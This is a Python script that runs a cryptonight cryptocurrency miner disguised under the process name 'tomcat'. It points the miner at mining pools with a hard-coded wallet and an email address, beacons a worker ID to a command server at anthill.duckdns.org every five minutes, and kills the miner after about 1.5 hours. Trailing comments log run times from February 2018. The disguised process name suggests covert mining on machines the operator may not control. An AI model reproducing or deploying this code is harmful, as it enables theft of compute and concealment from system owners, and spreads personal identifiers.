import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:05.815427
#2018-02-17 16:17:06.191743
#2018-02-17 18:06:04.322439
#2018-02-17 19:53:07.218340
#2018-02-17 21:43:06.599065
#2018-02-17 23:27:05.425472
#2018-02-18 01:17:01.739189
#2018-02-18 03:04:06.155818
#2018-02-18 04:50:09.639744
#2018-02-18 06:41:07.560715
#2018-02-18 08:30:05.762549
#2018-02-18 10:17:05.936492
#2018-02-18 12:03:03.351687
#2018-02-18 13:48:06.224625
#2018-02-18 15:38:05.498033
#2018-02-18 17:27:04.823019
#2018-02-18 19:15:05.947531
#2018-02-18 21:01:05.473643
#2018-02-18 22:47:06.828068
#2018-02-19 00:37:05.056150
#2018-02-19 02:23:04.994195
#2018-02-19 04:10:08.453416
#2018-02-19 05:54:05.802958
#2018-02-19 07:44:07.777587
#2018-02-19 09:34:01.300569
#2018-02-19 11:24:07.979516
#2018-02-19 13:11:01.583617
#2018-02-19 14:58:03.059783
#2018-02-19 16:46:07.232672
#2018-02-19 18:33:01.442265
#2018-02-19 20:20:07.844121
#2018-02-19 22:09:04.288048
#2018-02-19 23:56:04.977839
#2018-02-20 01:42:08.107732
#2018-02-20 03:30:07.477864
#2018-02-20 05:17:04.421834
#2018-02-20 06:59:07.708449
#2018-02-20 08:46:08.032585
#2018-02-20 10:30:03.640090
#2018-02-20 12:15:03.247271
#2018-02-20 14:04:08.671997
#2018-02-20 15:48:06.367799
#2018-02-20 17:35:10.762668
#2018-02-20 19:24:04.356246
#2018-02-20 21:12:05.990825
#2018-02-20 22:56:07.246288
#2018-02-21 00:41:06.497695
#2018-02-21 02:27:06.960040
#2018-02-21 04:14:06.833955
#2018-02-21 06:02:13.414622
#2018-02-21 07:49:07.780107
#2018-02-21 09:35:07.519087
#2018-02-21 11:24:06.150270
#2018-02-21 13:12:07.945640
#2018-02-21 14:58:01.936604
#2018-02-21 16:46:14.665546
#2018-02-21 18:35:02.053214
#2018-02-21 20:20:09.457083
#2018-02-21 22:08:06.916808
#2018-02-21 23:54:08.196293
#2018-02-22 01:42:03.559904
#2018-02-22 03:30:09.656475
#2018-02-22 05:17:05.235663
#2018-02-22 07:01:02.078419
#2018-02-22 08:48:06.107326
#2018-02-22 10:36:07.686038
#2018-02-22 12:24:07.576294
#2018-02-22 14:09:01.332162
#2018-02-22 15:55:10.393087
#2018-02-22 17:41:04.512653
#2018-02-22 19:27:08.660159
#2018-02-22 21:20:08.676785
#2018-02-22 23:05:07.810554
#2018-02-23 00:51:07.342221
#2018-02-23 02:38:07.172967
#2018-02-23 04:27:06.588836
#2018-02-23 06:14:08.360301
#2018-02-23 08:01:03.807147
#2018-02-23 10:08:06.260152
#2018-02-23 12:02:06.815373
#2018-02-23 13:49:08.852800
#2018-02-23 15:41:01.524480
#2018-02-23 17:27:08.476524
#2018-02-23 19:14:07.572951
#2018-02-23 20:59:04.628436
#2018-02-23 22:45:01.520074
#2018-02-24 00:33:02.208694
#2018-02-24 02:24:05.045949
#2018-02-24 04:13:01.297929
#2018-02-24 06:01:05.516308
#2018-02-24 07:49:03.639877
#2018-02-24 09:28:07.337682
#2018-02-24 11:21:03.693695
#2018-02-24 13:10:06.834545
#2018-02-24 15:00:04.409675
#2018-02-24 16:50:04.190016
#2018-02-24 18:38:05.362321
#2018-02-24 20:29:01.269393
#2018-02-24 22:27:01.287466
#2018-02-25 01:37:03.970913
#2018-02-25 04:55:05.264773
#2018-02-25 09:22:01.843641